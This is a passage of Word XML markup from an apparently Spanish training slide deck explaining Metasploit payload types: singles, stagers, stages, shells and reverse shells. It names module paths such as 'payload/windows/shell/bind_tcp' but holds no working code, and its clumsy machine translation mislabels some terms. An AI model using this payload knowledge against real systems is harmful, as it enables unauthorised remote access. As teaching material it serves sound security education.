          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>payload/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>adduser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27FB881C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="154"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77A150F1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1013"/>
        </w:tabs>
        <w:ind w:left="1013" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escenógrafos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AB254A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="86" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1734" w:right="854" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Este tipo de carga útil se utiliza para descargar una carga útil grande a la máquina objetivo desde la máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC2458C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="51"/>
        <w:ind w:left="1374"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Crea una conexión de red entre el atacante y la máquina comprometida.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F2F883" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="34"/>
        <w:ind w:left="1374"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">− </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>payload/windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="49346C51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="153"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B2C3823" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1013"/>
        </w:tabs>
        <w:ind w:left="1013" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Etapas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A729950" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="32"/>
        <w:ind w:left="1374"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Estas son las grandes cargas útiles descargadas por los stagers y luego ejecutadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497082FB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="33"/>
        <w:ind w:left="1374"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">− Asignado para realizar tareas complejas como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>escritorio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>remoto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DA6C1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="33"/>
        <w:ind w:left="1374"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">− </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>payload/windows/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FD33692" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="480" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54E14DA3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="984"/>
        </w:tabs>
        <w:spacing w:before="119" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="984" w:right="1261"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Los shells </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>son una interacción no GUI con el sistema, uno puede interactuar y administrar el entorno del sistema a través del shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C54CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="329"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FE66EF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="984"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="984" w:right="3252"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se utiliza con fines de administración y, a veces, se describe como fructífero en comparación con la GUI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABFC194" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="264"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59723430" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="983"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="983" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D490516" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1703"/>
        </w:tabs>
        <w:spacing w:before="88"/>
        <w:ind w:left="1703" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554C2D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2423"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2423" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Símbolo del sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC334CD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2423"/>
        </w:tabs>
        <w:spacing w:before="91"/>
        <w:ind w:left="2423" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Power Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD8AFE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1703"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="1703" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5A090B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2423"/>
        </w:tabs>
        <w:spacing w:before="93"/>
        <w:ind w:left="2423" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Shell de Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19AB83" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2423"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="2423" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Cáscara</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> SH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D58321" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="940" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481447DA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Conchas inversas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D155F3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="772"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Aquí, la máquina objetivo se conecta de nuevo a la caja atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F3C0B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="244"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D3400BE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Toda la comunicación pasa por puertos TCP específicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D6CEF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="243"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41190D07" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1823"/>
        </w:tabs>
        <w:ind w:left="1823" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Necesitamos tener un oyente activo en la máquina atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79159749" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="241"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C59D23D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
